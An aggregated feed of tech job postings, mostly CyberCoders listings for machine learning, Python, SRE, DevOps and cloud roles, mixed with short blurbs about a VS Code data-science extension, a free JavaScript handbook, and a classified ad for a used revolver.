Lead Machine Learning Software Engineer - up to 220k + bonus Lead Machine Learning Software Engineer - up to 220k + bonus - Skills Required - Machine Learning, Deep Learning, Natural Language Processing, Computer Vision, Programming with languages such as Python/C/Java, Full lifecycle experience Location: Work remote initially, once established office will be either Redwood City OR San Jose. Will need to be in the office 2-3 days per week minimum. Salary: Up to 220k base plus bonus Skills: Machine learning, full lifecycle experience, programming with a variety of languages Work for an industry leader which is one of the largest consumer products brands around the globe! It's an exciting time for our brand as we continue to move forward with our digital/IoT strategy. If you are a Lead Machine Learning Software Engineer please read on........ **Top Reasons to Work with Us** - Work for an industry leading consumer products brand - Excellent benefits including 401k contribution, bonuses and much more..... - Excellent work/life balance and positive company culture **What You Will Be Doing** As the Lead Machine Learning Engineer you will be very hands on defining and delivering solutions which will bring delightful user experiences globally. 
Key responsibilities: - Work with a cross functional team which is developing products for consumers across the globe - Utilize machine learning, computer vision, NLP and speech recognition techniques to create innovative products - Be the SME for Machine Learning in our product group - Stay abreast of the latest machine learning techniques and technologies and advise the company on how they can be applied to our products - Architect and implement smart IoT products - Mentor more junior engineers - Participate in code reviews **What You Need for this Position** Required: 5+ years in software engineering Strong Machine learning skills Programming with languages such as Python, C and Java Ideally you will have experience with at least some of these specific areas: computer vision, speech recognition, natural language processing **What's In It for You** Market rates salaries (150-220k) plus bonus and full benefits package! So, if you are a Lead Software Engineer that specializes in Machine Learning, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Lead Machine Learning Software Engineer - up to 220k + bonus* *CA-San Jose* *SJ2-LeadML-SJ*
          (USA-PA-Pittsburgh) Computer Vision / Deep Learning Engineer      Cache   Translate Page      
Computer Vision / Deep Learning Engineer Computer Vision / Deep Learning Engineer - Skills Required - Computer Vision, C++, Caffe, Tensorflow, Lidar, Geometry-Based Vision, Deep Learning, Multi-view stereo I am currently working with several companies in the area who are actively hiring in the field of Computer Vision and Deep Learning. AI, and specifically Computer Vision and Deep Learning are my niche market specialty and I only work with companies in this space. I am actively recruiting for multiple levels of seniority and responsibility, from experienced Individual Contributor roles, to Team Lead positions, to Principal Level Scientists and Engineers. I offer my candidates the unique proposition of representing them to multiple companies, rather than having to work with multiple different recruiters at an agency, or applying directly to many different companies without someone to manage the process with each of those opportunities. In one example, I am working with a candidate who is currently interviewing with 10 different clients of mine for similar roles across the country with companies applying Computer Vision and Deep Learning to various different applications from Robotics, Autonomous Vehicles, AR/VR/MR, Medical Imaging, Manufacturing Automation, Gaming, AI surveillance, AI Security, Facial ID, 3D Sensors and 3D Reconstruction software, Autonomous Drones, etc. I would love to work with you and introduce you to any of my clients you see as a great fit for your career! Please send me a resume and tell me a bit about yourself and I will reach out and offer some times to connect on the phone! **Top Reasons to Work with Us** Some of the current openings are for the following brief company overviews: Company 1 - company is founded by 3x Unicorn (multi-billion dollar companies) founders and are breaking into a new market with advanced technology, customers, and exciting applications including AI surveillance, robotics, AR/VR. Company 2 - Autonomous Drones! 
Actually, multiple different companies working on Autonomous Drones for different applications - including Air-to-Air Drone Security, Industrial Inspection, Consumer Drones, Wind Turbine and Structure Inspection. Company 3 - 3D Sensors and 3D Reconstruction Software - make 3D maps of interior spaces using our current products on the market. We work with builders, designers, Consumers and Business-to-Business solutions. Profitable company with strong leadership team currently in growth mode! Company 4 - Industrial/Manufacturing/Logistics automation using our 3D and Depth Sensors built in house and 3D Reconstruction software to automate processes for Fortune 500 clients. Solid funding and revenue approaching profitability in 2018! Company 5 - Hand Gesture Recognition technology for controlling AR/VR environments. We have a product on the market as of 2017 and are continuing to develop products for consumers and business applications that are used in the real and virtual world. We have recently brought on a renowned leader in Deep Learning and its intersection with neuroscience and are doing groundbreaking R&D in this field! Company 6 - Full facial tracking and reconstruction for interactive AR/VR environments. Company 7 - massively scalable retail automation using Computer Vision and Deep Learning, currently partnered with one of the largest retailers in the world. Company 8 - Products in the market including 3D Sensors, and currently bringing 3D reconstruction capabilities to mobile devices everywhere. Recently closed on a $50M round of funding and expanding US operations. Company 9 - Mobile AI company using Computer Vision for sports tracking and real-time analytics for players at all levels from beginner to professional athletes to track, practice and improve at their craft. 
Company 10 - Digitizing human actions to create a massive new dataset in manufacturing - augmenting the human/robot working relationship and giving manufacturers the necessary info to improve that relationship. We believe that AI and robotics will always need to work side by side with humans, and we are the only company providing a solution to this previously untapped dataset! Company 11 - 3D facial identification and authentication for security purposes. No more key-fobs and swipe cards, our clients use our sensors and software to identify and permit employees. **What You Will Be Doing** If you are interested in discussing any of these opportunities, I would love to speak with you! I am interested in learning about the work you are currently doing and what you would be interested in for your next step. If the above opportunities are not quite what you're looking for but would still like to discuss future opportunities and potential to work together, I would love to meet you! I provide a free service to my candidates and work diligently to help manage the stressful process of finding the right next step in your career. The companies that I work with are always evolving so I can keep you up to date on new opportunities I come across. Please apply to this job, or shoot me an email at richard.marion@cybercoders.com and let's arrange a time to talk on the phone. **What You Need for this Position** Generally, I am looking for Scientists/Engineers in the fields of Computer Vision, Deep Learning and Machine Learning. 
I find that a lot of my clients are looking for folks who have experience with 3D Reconstruction, SLAM / Visual Odometry, Object Detection/Recognition/Tracking, autonomy, Point Cloud Processing, Software and Algorithm development in C++ (and C++11 and C++14), GPU programming using CUDA or other GPGPU related stuff, Neural Network training, Sensor Fusion, Multi-view stereo, camera calibration or sensor calibration, Image Segmentation, Image Processing, Video Processing, and plenty more! - Computer Vision - C++ - Python - Linux - UNIX **What's In It for You** A dedicated and experienced Computer Vision placement specialist! If you want to trust your job search in the hands of a professional who takes care and pride in their work, and will bring many relevant opportunities your way - I would love to work with you! So, if you are a Computer Vision Scientist or Engineer and are interested in having a conversation about the market and some of the companies I am working with, please apply or shoot me an email with resume today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Computer Vision / Deep Learning Engineer* *PA-Pittsburgh* *RM2-1492758*
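The listing above repeatedly mentions camera calibration and multi-view geometry. As an illustrative sketch only (not any client's code, and with made-up intrinsics), the core pinhole-camera projection behind those topics fits in a few lines of Python:

```python
def project_point(point_3d, fx=800.0, fy=800.0, cx=320.0, cy=240.0):
    """Project a 3D point (X, Y, Z) in camera coordinates to (u, v) pixel
    coordinates with a pinhole model. The intrinsics (focal lengths fx, fy
    and principal point cx, cy) default to invented example values."""
    x, y, z = point_3d
    if z <= 0:
        raise ValueError("point must be in front of the camera (Z > 0)")
    # Perspective divide by depth, then scale and shift into pixel space.
    return (fx * x / z + cx, fy * y / z + cy)

# A point 2 m ahead and 0.5 m to the right lands right of the image center.
uv = project_point((0.5, -0.25, 2.0))
print(uv)  # (520.0, 140.0)
```

Calibration, in this framing, is the problem of estimating fx, fy, cx, cy (plus lens distortion) from observations rather than assuming them.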
          MapR Solutions Architect - Perficient - National, WV
Design and develop open source platform components using Spark, Java, Oozie, Kafka, Python, and other components....
From Perficient - Wed, 03 Oct 2018 20:48:20 GMT - View all National, WV jobs
          (USA-IL-Chicago) Lead Python Developer
Lead Python Developer Lead Python Developer - Skills Required - Flask, Python, RESTful APIs, GIT, Automated Testing If you are a Lead Python Developer with 5+ years experience, please read on! **Top Reasons to Work with Us** 1. Based in Chicago, we use data analytics to create and maintain high-performance agile development teams that deliver innovative software design for digital enterprises. 2. Our company has been around for over a decade, so we offer a unique balance of stability and a small, tight-knit feel. 3. You will have the chance to work on exciting new development projects with a talented team. **What You Will Be Doing** - Responsible for developing applications using the Python language and the Flask framework and related technologies in any Cloud technology. - Responsible for understanding the cloud technology and resolving issues during deployment and development. - Responsible for guiding the team on any issues with respect to cloud development. - Responsible for executing software development from conceptual phase to testing phase. - Design solutions that align with client's departmental and enterprise goals - Demonstrate interaction with functional prototypes. - Work within an agile environment to design user-centric applications. - Monitor performance, technical strategy and propose best practices. - Produce deliverables that are consumable by any other team - Translate field research findings into design improvements. - Communicate design strategy and improvements to key stakeholders. - Collaborate with other teams to develop cross-product design solutions. - Comprehend, communicate and adhere to client's standards. - Attend required meetings and maintain open communication about project status - Understand Agile Methodology (Scrum) - Ability to work in multiple projects and guide resources with definite solution. 
**What You Need for this Position** - At least 5 years of proven professional development experience - Experience leading small teams - Proficient with Python - Proficient with the Flask web framework - Proficient with automated testing (JUnit, Cucumber, etc…) - Proficient with VCS (Git, SVN) - Experience with dependency management (Maven, Gradle, etc) - Experience with performance tuning enterprise applications - Experience with debugging enterprise applications - Experience with RESTful APIs - Experience with Google Cloud Platform is a strong plus - Preferred experience with Kubernetes, containers - Experience with Airflow is a plus - Understanding of CI/CD - Understanding of Object Oriented Principles - Understanding SOLID principles - Should be hands-on and should be able to do code reviews, continuous integration & validation - Proficient understanding of code versioning tools, such as Git, SVN **What's In It for You** - Competitive Salary - Unlimited Vacation within reason - PTO - Medical - Dental - Vision - Bonus - 401k So, if you are a Lead Python Developer with 5+ years experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Lead Python Developer* *IL-Chicago* *PG2-1492830*
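The posting above centers on Python, Flask, and RESTful APIs. As a minimal, hedged sketch of that stack (the endpoint name and payload shape are invented for illustration, and this assumes Flask is installed):

```python
from flask import Flask, jsonify, request

app = Flask(__name__)
ITEMS = []  # in-memory store, just for the sketch

@app.route("/items", methods=["GET"])
def list_items():
    # Return the whole collection as JSON.
    return jsonify(ITEMS)

@app.route("/items", methods=["POST"])
def create_item():
    # Accept a JSON body, append it to the store, echo it back with 201.
    item = request.get_json(force=True)
    ITEMS.append(item)
    return jsonify(item), 201

# In a real service you would run `app.run()` (or a WSGI server) here;
# automated tests would exercise the routes via app.test_client().
```

A role like this would pair such code with automated tests (e.g. pytest driving Flask's test client) and CI, as the requirements list suggests.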
          (USA-IL-Chicago) 50% REMOTE- Site Reliability Engineer- YEAR CONTRACT
50% REMOTE- Site Reliability Engineer- YEAR CONTRACT 50% REMOTE- Site Reliability Engineer- YEAR CONTRACT - Skills Required - Python, AWS, Terraform, Puppet, Devops If you are a 50% REMOTE- Site Reliability Engineer with experience, please read on! -YEAR LONG CONTRACT **Top Reasons to Work with Us** 1. Based in Chicago, we are the first and only Customer Identity Solution. Our platform transforms the customer experience by providing contextual relevance at all points of engagement. 2. Our company has been around for over 8 years, so we offer a unique balance of stability and a small, tight-knit feel. 3. You will have the chance to work on exciting new development projects with a talented team. **What You Will Be Doing** - Work with Program Managers, Software Engineers, and Service Owners to ensure the reliability, availability, and performance of services. - Develop, improve, and maintain automation services and build systems for continuous automated testing. - Build, scale, and secure SaaS application infrastructure on multiple cloud providers - Establish policies and best practices for operational readiness and partner with development to ensure adoption - Ensure maintenance of production resource including load balancing and API gateways. 
- Work closely with developers during the deployment and testing phases to provide insight into operational, security, and performance considerations **What You Need for this Position** - Experience with AWS services - General linux and bash skills (especially troubleshooting issues: strace, tcpdump, telnet, nc) - Basic networking skills (understand subnets, CIDR, firewall rules) - Strong Python experience - Strong Terraform experience - Strong Packer experience - Strong Puppet experience - Familiarity with some sort of build tool would be nice (pants, buck, bazel) - CI/Build/Test tools (Jenkins, specifically) - Experience with a monitoring and alerting pipeline (we use prometheus/alertmanager as well as graphite) So, if you are a 50% REMOTE- Site Reliability Engineer with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *50% REMOTE- Site Reliability Engineer- YEAR CONTRACT* *IL-Chicago* *PG2-1492827*
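Listings like this lean heavily on automation around flaky infrastructure. As an illustrative (not company-specific) sketch, here is the kind of small retry-with-exponential-backoff helper an SRE might wrap around a health check; the probe and sleep functions are injected so the logic stays testable:

```python
import time

def check_with_backoff(probe, attempts=4, base_delay=0.5, sleep=time.sleep):
    """Call `probe()` until it returns True or attempts run out.

    The delay doubles after each failure: base_delay, 2*base_delay, ...
    Returns True on success, False if every attempt failed.
    """
    for attempt in range(attempts):
        if probe():
            return True
        if attempt < attempts - 1:  # no sleep after the final failure
            sleep(base_delay * (2 ** attempt))
    return False

# Example: a probe that fails twice, then succeeds. Recording delays
# instead of actually sleeping keeps the demo instant.
_calls = {"n": 0}
def flaky_probe():
    _calls["n"] += 1
    return _calls["n"] >= 3

delays = []
ok = check_with_backoff(flaky_probe, attempts=4, base_delay=0.5, sleep=delays.append)
print(ok, delays)  # True [0.5, 1.0]
```

In production this pattern usually gains jitter and a cap on the maximum delay; the skeleton above only shows the core idea.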
          (USA-NV-Henderson) Site Reliability Engineer - Interactive Music Platform
Site Reliability Engineer - Interactive Music Platform Site Reliability Engineer - Interactive Music Platform - Skills Required - Site Reliability, Kubernetes, Terraform, Automation, UNIX, Docker, Linux, Jenkins, RabbitMQ, Kafka Our company is a social music platform that utilizes proprietary BIG DATA technology to connect independent artists with music fans, industry professionals and entertainment companies. We help independent artists protect, distribute and monetize their music, while providing music fans with a platform to discover new music from emerging artists. Here's a quick summary of who we are and what we do: We use what we've learned from the music industry and artists to create products that connect them and make their lives easier. We're 20% a music company and 80% a tech company. **Top Reasons to Work with Us** We connect the music industry to artists. Every product we create helps us to accomplish that mission. We're looking for talented, like-minded team members to help us in our mission. If that's you, we're thrilled you're here. **What You Will Be Doing** - Work with Program Managers, Software Engineers, and Service Owners to ensure the reliability, availability, and performance of services. - Own projects and initiatives within the team, provide peers with technical mentorship and direction. - Participate in service capacity and demand planning/forecasting, software performance analysis, and system tuning. Tackle problems relating to mission-critical services and build automation to prevent problem recurrence; with the goal of automated response to all non-exceptional service conditions. - Identify underlying root causes and provide recommendations or solutions for long-term permanent fixes to critical production issues. - Develop effective documentation, tooling, and alerts to both identify and address reliability risks. - Participate in on-call rotation with other members of the Site Reliability Engineering Team. 
**What You Need for this Position** - Experience working with Unix/Linux systems from kernel to shell and beyond, with experience with system libraries, file systems, and client-server protocols. - Heavy experience in distributed systems architectures - layered, event-driven, data-centered, service mesh, etc. - Familiarity with distributed message buses such as Kafka and RabbitMQ. - The ability to read/write code fluently in any of the following: Java, Python, or Go. - Networking: experience with network theory and protocols, e.g. TCP/IP, UDP, DNS, HTTP, TLS, and load balancing. - In-depth understanding of the Software Development Process; including CI and CD pipeline architecture. - An understanding of cloud orchestration frameworks, enterprise IT service provisioning tools, and their role in IT transformation. - Experience with the public and private cloud, including OpenStack, AWS, and Google Cloud Platform. - Familiarity with service configuration and deployment tools, such as Ansible, Consul, Jenkins, Terraform, and Vault. - Experience with container technologies such as Docker and Kubernetes. - Strong interpersonal and communication skills. **What's In It for You** Benefits and...all the good stuff... - $110,000-$130,000 Base - Opportunity to contribute as part of the founding team responsible in creating our innovative music platform that helps the music industry connect with artists in ways that have never been done before. - Opportunities to work and interact directly with our founders, board members and senior executive team. - Career advancement opportunities: As an emerging company experiencing rapid growth, our company provides the perfect environment for an employee to define and achieve their ideal desired professional career path. - Well funded: Series B funding round has been well received and over subscribed. - Proven and experienced management team and board with startup and liquidity experience. 
- Typical startup perks such as car washes, regular team lunches, company events, complimentary snacks and drinks, etc… - Stock ownership opportunities - Comfortable, productive and creative workspaces including lounges, quiet areas and kitchen. - Casual dress code - Flexible work schedule - Agile development environment - Patented technologies So, if you are a Site Reliability Engineer - Interactive Music Platform with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Site Reliability Engineer - Interactive Music Platform* *NV-Henderson* *PM5-1492855*
          (USA-OH-Columbus) Senior DevOps Engineer
Senior DevOps Engineer Senior DevOps Engineer - Skills Required - Devops, AWS, Cloud, Agile, Build and CI automation tools, Scripting languages- Python/Bash/Go, Docker Containers/containers, Linux System Administration, Collaboration tools - Jira/Confluence/Slack If you are a DevOps Engineer with 5+ years of experience, please read on! --CANDIDATES WHO FILL OUT THE SKILLS AND QUESTIONS PORTION OF THE APPLICATION WILL RECEIVE TOP PRIORITY-- With our HQ in Europe, and multiple offices in the US, we are a leading developer, manufacturer and supplier of RFID products and IoT solutions. In other words...we make products that help businesses identify, authenticate, track and complement product offerings. We are growing at an extremely high rate and are looking to add a talented Senior DevOps Engineer in our Columbus, OH office who has over 5 years of relevant experience, with strong AWS and Automation experience. The engineer will create cloud formation templates to build AWS services and maintain development, staging, demo, and production environments. This is a unique, special opportunity to get in early with a rapidly growing company. Sound like you? Email your most updated resume ASAP to neda.talebi@cybercoders.com! 
**What You Will Be Doing** - Review and analyze existing cloud applications (AWS) - Design and implement solutions and services in the cloud - Provide guidance and expertise on DevOps, migrations, and cloud technologies to developers and in some cases partners or customers - Be devoted to knowing the latest trends in the Cloud space and solutions - Demonstrated usage of Agile and DevOps processes and activities on project execution - Ability to use wide variety of open source technologies and cloud services - Experience w/ automation and configuration management w/in DevOps environment **What You Need for this Position** - 5+ years relevant experience - Strong demonstrated usage of Agile and DevOps processes on project execution - Strong AWS experience - Previous experience maintaining applications in the cloud - required - Strong knowledge of Build & CI automation tools - Strong knowledge of docker containerization - Strong knowledge of source code management tools & artifact management (GitHub) - Good knowledge of scripting languages - Python, Bash, Go - Good knowledge of linux system administration - Good knowledge of infrastructure as Code - AWS CloudFormation - General knowledge of collaboration tools - Jira, Confluence, Slack - Strong communication skills - Strong problem solving skills - Takes initiative/lead by example -AWS certification is a plus! **What's In It for You** - Competitive base salary (DOE) - PTO - Health insurance - top of the line - 401k w/ matching - Huge room for growth - Unique, special opportunity to get in early with a growing company So, if you are a DevOps Engineer with 5+ years of experience, please apply today! --CANDIDATES WHO FILL OUT THE SKILLS AND QUESTIONS PORTION OF THE APPLICATION WILL RECEIVE TOP PRIORITY-- Applicants must be authorized to work in the U.S. 
**CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Senior DevOps Engineer* *OH-Columbus* *NT2-1492892*
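The role above calls out infrastructure-as-code with AWS CloudFormation. As an illustrative fragment only (the resource name is invented), a minimal CloudFormation template declaring a single versioned S3 bucket looks like this:

```yaml
AWSTemplateFormatVersion: '2010-09-09'
Description: Minimal example template (illustrative only)
Resources:
  ExampleArtifactBucket:
    Type: AWS::S3::Bucket
    Properties:
      VersioningConfiguration:
        Status: Enabled
```

Templates like this are typically validated and deployed through a CI pipeline rather than applied by hand, which is the workflow the posting describes.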
          [Translation] Data Science in Visual Studio Code with Neuron
Today we have a short story about Neuron, an extension for Visual Studio Code that is a genuine killer feature for data scientists. It lets you combine Python, any machine learning library, and Jupyter Notebooks. More details below the cut!
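To make that concrete, here is an invented example of the kind of notebook-style cell you would evaluate interactively in an editor like this (plain standard-library Python; the numbers are made up):

```python
# A notebook-style cell: quick descriptive stats over a small sample.
import statistics

rents = [114.87, 113.48, 76.5, 68.2, 59.9]  # invented per-square-meter prices
mean_rent = statistics.mean(rents)
median_rent = statistics.median(rents)
print(round(mean_rent, 2), median_rent)  # 86.59 76.5
```

The appeal of notebook tooling is exactly this loop: run a cell, inspect the result inline, tweak, and rerun without leaving the editor.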
          This handbook wants you to learn 80% of all JavaScript in 20% of the time

If you are a developer, or you are learning to code and want to dig into the strengths of JavaScript, one of the most widely used programming languages even beyond the browser, this handbook will interest you.

Courtesy of Flavio Copes, a computer engineer who writes tutorials for other programmers and has been offering JavaScript training for quite a while, we have this eBook titled "The Complete JavaScript Handbook".

From zero to skilled programmer

The handbook, which you can read online or download as PDF, ePub, or Mobi simply by subscribing to Flavio's newsletter, explains JavaScript from scratch and aims to give you all the fundamentals you need to become a skilled, efficient JavaScript programmer.

JavaScript Handbook

As its creator explains, this handbook follows the 80/20 rule: it aims for the student to learn 80% of JavaScript in 20% of the time. Its contents range from the basic definitions to variables, types, classes, exceptions, code style, structures, events, loops, math operators, and more.

The book was shared through freeCodeCamp's Medium blog, one of our favorite online platforms for learning to code, and one that always shares additional resources for anyone who wants to learn computer science.

If this handbook proves useful and you fall in love with JavaScript, you may want to combine it with freeCodeCamp's full JavaScript curriculum, which runs 300 hours and offers completely free certification.


          (USA-TX-Austin) Senior Full-Stack Engineer - Rapidly Growing Tech Startup
Senior Full-Stack Engineer - Rapidly Growing Tech Startup Senior Full-Stack Engineer - Rapidly Growing Tech Startup - Skills Required - REACT, Angular, JavaScript, MVC, Vue, GIT, No-SQL, NODE, PHP, Node.js If you are a Senior Full-Stack Engineer with experience, please read on! **Top Reasons to Work with Us** 1. Based in Austin, we are a rapidly growing Tech startup company. 2. Opportunity to work on a fast-paced team in a startup environment. 3. You will get the chance to work on exciting new projects. **What You Will Be Doing** - Our engineering team is innovating every day — tackling some of the gnarliest problems out there at the intersection of eCommerce and big data — and we're looking for a few good coders to join us. - After getting ramped up, you'll be expected to dive into our stack and start shipping code. - Contribute product ideas as well as code. **What You Need for this Position** - Full Stack engineering knowledge with any server-side language and JavaScript (on both client and server) - Experience with object oriented MVC frameworks - Source Control (git) - Familiar with Frontend frameworks (Angular, React, Vue) - Ability to contribute in monolithic and microservice architectures - At least 4 years of relevant experience - Proficient in Relational and No-SQL concepts - Understands the Agile process - Python - Node.js - React - C# **What's In It for You** - Competitive Base Salary ($90k-$120k) - Medical/Dental/Vision coverage - 401k - Vacation/PTO - Tuesdays / Fridays are optional WFH days - Life Insurance - Short and Long term Disability So, if you are a Senior Full-Stack Engineer with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. 
**Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Senior Full-Stack Engineer - Rapidly Growing Tech Startup* *TX-Austin* *KC9-1492771*
          (USA-CA-Los Angeles) OpenStack Cloud Developer - WORK FROM HOME | 100% REMOTE
OpenStack Cloud Developer - WORK FROM HOME | 100% REMOTE OpenStack Cloud Developer - WORK FROM HOME | 100% REMOTE - Skills Required - Python, Openstack, Cloud, Infrastructure, Django, Flask, SaltStack, Salt Stack, Open Stack, KVM If you are an OpenStack Cloud Developer with experience, please read on! Title: OpenStack Cloud Developer Location: WORK FROM HOME | 100% REMOTE Hourly Wage: Contract | Depending on experience We are a national leader in high-performance SSD virtual servers looking for a developer with a deep understanding of virtualization and web technologies. Our company builds and maintains our in-house systems leveraging an OpenStack cloud environment. You will collaborate with our team to design, build, and maintain our in-house systems as we transition into the cloud. **What You Need for this Position** - Python - Openstack - Flask - KVM **What's In It for You** - Competitive base salary and overall compensation package - Full benefits: Medical, Dental, Vision - 401(k) with generous company match - Generous Paid time off (PTO) - Vacation, sick, and paid holidays - Life Insurance coverage 1. Apply directly to this job opening here! Or 2. E-mail directly for more information to James@CyberCoders.com Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *OpenStack Cloud Developer - WORK FROM HOME | 100% REMOTE* *CA-Los Angeles* *JT7-1492905*
          (USA-WA-Seattle) OpenStack Cloud Developer - WORK FROM HOME | 100% REMOTE
OpenStack Cloud Developer - WORK FROM HOME | 100% REMOTE OpenStack Cloud Developer - WORK FROM HOME | 100% REMOTE - Skills Required - Python, Openstack, Cloud, Infrastructure, Django, Flask, SaltStack, Salt Stack, Open Stack, KVM If you are an OpenStack Cloud Developer with experience, please read on! Title: OpenStack Cloud Developer Location: WORK FROM HOME | 100% REMOTE Hourly Wage: Contract | Depending on experience We are a national leader in high-performance SSD virtual servers looking for a developer with a deep understanding of virtualization and web technologies. Our company builds and maintains our in-house systems leveraging an OpenStack cloud environment. You will collaborate with our team to design, build, and maintain our in-house systems as we transition into the cloud. **What You Need for this Position** - Python - Openstack - Flask - KVM **What's In It for You** - Competitive base salary and overall compensation package - Full benefits: Medical, Dental, Vision - 401(k) with generous company match - Generous Paid time off (PTO) - Vacation, sick, and paid holidays - Life Insurance coverage 1. Apply directly to this job opening here! Or 2. E-mail directly for more information to James@CyberCoders.com Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *OpenStack Cloud Developer - WORK FROM HOME | 100% REMOTE* *WA-Seattle* *JT7-1492915*
          (USA-NY-New York City) OpenStack Cloud Developer - WORK FROM HOME | 100% REMOTE
OpenStack Cloud Developer - WORK FROM HOME | 100% REMOTE OpenStack Cloud Developer - WORK FROM HOME | 100% REMOTE - Skills Required - Python, Openstack, Cloud, Infrastructure, Django, Flask, SaltStack, Salt Stack, Open Stack, KVM If you are an OpenStack Cloud Developer with experience, please read on! Title: OpenStack Cloud Developer Location: WORK FROM HOME | 100% REMOTE Hourly Wage: Contract | Depending on experience We are a national leader in high-performance SSD virtual servers looking for a developer with a deep understanding of virtualization and web technologies. Our company builds and maintains our in-house systems leveraging an OpenStack cloud environment. You will collaborate with our team to design, build, and maintain our in-house systems as we transition into the cloud. **What You Need for this Position** - Python - Openstack - Flask - KVM **What's In It for You** - Competitive base salary and overall compensation package - Full benefits: Medical, Dental, Vision - 401(k) with generous company match - Generous Paid time off (PTO) - Vacation, sick, and paid holidays - Life Insurance coverage 1. Apply directly to this job opening here! Or 2. E-mail directly for more information to James@CyberCoders.com Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *OpenStack Cloud Developer - WORK FROM HOME | 100% REMOTE* *NY-New York City* *JT7-1492914*
          (San Francisco) Colt Python 6" 357 Mag Mirror Royal Blue Finish with Box - $ 2,150
Factory fired only. Mint condition; looks like it just left the Colt factory. Factory deep dark mirror royal blue finish.
Excellent factory-tuned action, excellent bore and chamber, beautiful factory checkered walnut grips. Mint, 1976 (41 years old).
          (USA-CA-San Francisco) OpenStack Cloud Developer - WORK FROM HOME | 100% REMOTE
OpenStack Cloud Developer - WORK FROM HOME | 100% REMOTE OpenStack Cloud Developer - WORK FROM HOME | 100% REMOTE - Skills Required - Python, Openstack, Cloud, Infrastructure, Djangp, Flask, SaltStack, Salt Stack, Open Stack, KVM If you are a OpenStack Cloud Developer with experience, please read on! Title: OpenStack Cloud Developer Location: WORK FROM HOME | 100% REMOTE Hourly Wage: Contract | Depending on experience We are a national leader in high performance SSD virtual servers looking for a developer with a deep understanding of virtualization and web technologies. Our company builds and maintains our in-house systems leveraging an OpenStack cloud environment. You will collaborate with our team to design, build, and maintain our in-house systems as we transition into the cloud. **What You Need for this Position** - Python - Openstack - Flask - KVM **What's In It for You** - Competitive base salary and overall compensation package - Full benefits: Medical, Dental, Vision - 401 (K) with generous company match - Generous Paid time off (PTO) - Vacation, sick, and paid holidays - Life Insurance coverage 1. Apply directly to this job opening here! Or 2. E-mail directly for more information to James@CyberCoders.com Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *OpenStack Cloud Developer - WORK FROM HOME | 100% REMOTE* *CA-San Francisco* *JT7-1492916*
(USA-CA-Oakland) Principal Python Engineer

Principal Python Engineer (APIs, Distributed Systems)
Skills Required - Python, gRPC, Tornado, C, RabbitMQ, AWS, SQL, Kubernetes, Docker

If you are a Principal Python Engineer with experience, please read on!

**What You Will Be Doing**
As an integral member of the backend team, you'll participate in architecture sessions and provide valuable input, while also learning from the senior members of the team. You'll be expected to design, implement, and maintain APIs that are well-tested, well-documented, and maintainable. You like coding clean and take deadlines seriously. You'll also have plenty of mentorship opportunities, and will be expected to constantly learn and push your own technical boundaries.

**What You Need for this Position**
- Experience building and maintaining APIs
- Solid knowledge of Python from a backend/object-oriented perspective (not just data science or scripting)
- Experience with SQL databases
- Awareness of concepts related to distributed systems (e.g., message queues, asynchronous tasks, pub-sub systems)
- Proficiency in at least one compiled and one interpreted language

Nice to have:
- Experience in C, AWS, Kubernetes
